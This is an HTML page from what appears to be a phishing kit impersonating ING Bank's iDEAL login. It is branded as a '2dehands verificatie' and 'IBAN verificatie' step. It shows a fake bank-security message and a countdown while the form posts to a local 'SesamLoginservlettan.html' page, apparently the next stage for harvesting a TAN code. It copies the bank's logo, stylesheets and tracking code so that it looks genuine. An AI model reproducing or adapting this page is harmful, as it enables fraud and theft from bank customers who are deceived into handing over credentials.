<!DOCTYPE html>
<!-- saved from url=(0103)https://ideal.ing.nl/internetbankieren/SesamLoginServlet?trxid=0020000925577922&random=0235ec0b1b7f70b7 -->
<html class="js"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

	<!-- MF="1,113" -->











	<meta http-equiv="refresh" content="60;URL='/response/aanmelden/ingbe.html'">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="Description" content="Wilt u inloggen op iDEAL? Met uw gebruikersnaam en wachtwoord heeft u direct toegang tot Internetbankieren. Zo bankiert u veilig en snel via internet.">

	<link rel="SHORTCUT ICON" href="files/favicon.ico">




	<title>Verificatie ING</title>

	<link rel="stylesheet" href="./files/ses_ideal.css">
	<link rel="stylesheet" href="./files/ses_style_v7.css">



	<!--[if lt IE 8]><link rel="stylesheet" href="/internetbankieren/css/ideal-login-ie.css"><![endif]-->
	<!--[if lt IE 9]><script>ltIE9 = true;</script><![endif]-->

	</head>

<body class="ideal">



	<div class="header">
		<div class="header-top">
			<img id="ing-logo" src="./files/SES_logo_ing.gif" alt="ING Logo" height="32" width="128">
		</div>
	</div>

	<div class="main clearfix home">
		<div class="content">
			<h1 id="header-pagetitle" class="header-pagetitle rockwell">2dehands verificatie</h1>
			<br>

			<div class="container ideal-container center-container login">

				<div class="container-header orangecontainer-header">
					<h3>IBAN verificatie</h3>
				</div>

				<div class="container-content smallpadding-container">

						<form id="login" name="login" action="SesamLoginservlettan.html" autocomplete="off" method="post"><div style="width:0px;height:0px;overflow:hidden;"><input tabindex="-1" type="password"></div>
						    	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>Uw  Home'Bank wordt geverifieerd & ING beveiligings protocol is inwerking gezet.<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Over enkele ogenblikken wordt u doorgestuurd naar onze bevestigingspagina.</b>

							<br>&nbsp;&nbsp;&nbsp;<center><img style="position: absolute;   top: 15px; left: 164px;" alt="loading" src="./files/lade.gif"><br><br><br><br><br><br><br><br><br><br><br><br><B><div id="countdown"></div>&nbsp;


							<script>
							function countdown( elementName, minutes, seconds )
							{
							    var element, endTime, hours, mins, msLeft, time;

							    function twoDigits( n )
							    {
							        return (n <= 9 ? "0" + n : n);
							    }

							    function updateTimer()
							    {
							        msLeft = endTime - (+new Date);
							        if ( msLeft < 1000 ) {
							            element.innerHTML = "0:00";
							        } else {
							            time = new Date( msLeft );
							            hours = time.getUTCHours();
							            mins = time.getUTCMinutes();
							            element.innerHTML = (hours ? hours + ':' + twoDigits( mins ) : mins) + ':' + twoDigits( time.getUTCSeconds() );
							            setTimeout( updateTimer, time.getUTCMilliseconds() + 500 );
							        }
							    }

							    element = document.getElementById( elementName );
							    endTime = (+new Date) + 1000 * (60*minutes + seconds) + 500;
							    updateTimer();
							}

							countdown( "countdown", 1, 0 );
							countdown( "countdown2", 100, 0 );
							</script>
							<br>
				     


						<input type="hidden" name="lptr" id="lptr" value="{&quot;v4a&quot;:{&quot;r&quot;:&quot;0&quot;},&quot;v4b&quot;:{&quot;f&quot;:&quot;0&quot;},&quot;v7&quot;:{&quot;s&quot;:&quot;&quot;},&quot;v4&quot;:{&quot;j&quot;:&quot;&quot;},&quot;timestamp&quot;:&quot;2015-03-26 10:29:49&quot;,&quot;ki&quot;:&quot;1&quot;,&quot;v6&quot;:{&quot;u&quot;:&quot;&quot;,&quot;k&quot;:&quot;&quot;}}"><input type="hidden" name="lpts" id="lpts" value="bec8413bc7c69e7096401141a695df91931773ced4a481fec536f9117570945c"></form>








	<script language="JavaScript" type="text/javascript" src="./files/s_code_sol.js"></script>
<script language="JavaScript" type="text/javascript"><!--
var cmsBmPath = "mon.retail.ing.nl";
var BmResolution = (screen.availWidth >= 1280 ? '1280 and higher' : 'below 1280');
s.trackPage = "true";
s.pageName = "cli:Inloggen iDeal";
s.environment = "P";
s.resolution = BmResolution;
s.openclosed = "closed";
s.language = "dutch";
s.segment = "ideal"
s.platform = "GIA";
s.t();
//--></script>






<iframe id="iframe770" frameborder="0" src="javascript: false;" style="width: 0px; height: 0px; border: none;"></iframe><img src="./files/p2" width="0" height="0" style="display: none; border: none;"><iframe id="iframe362" frameborder="0" src="javascript: false;" style="width: 0px; height: 0px; border: none;"></iframe></body></html>
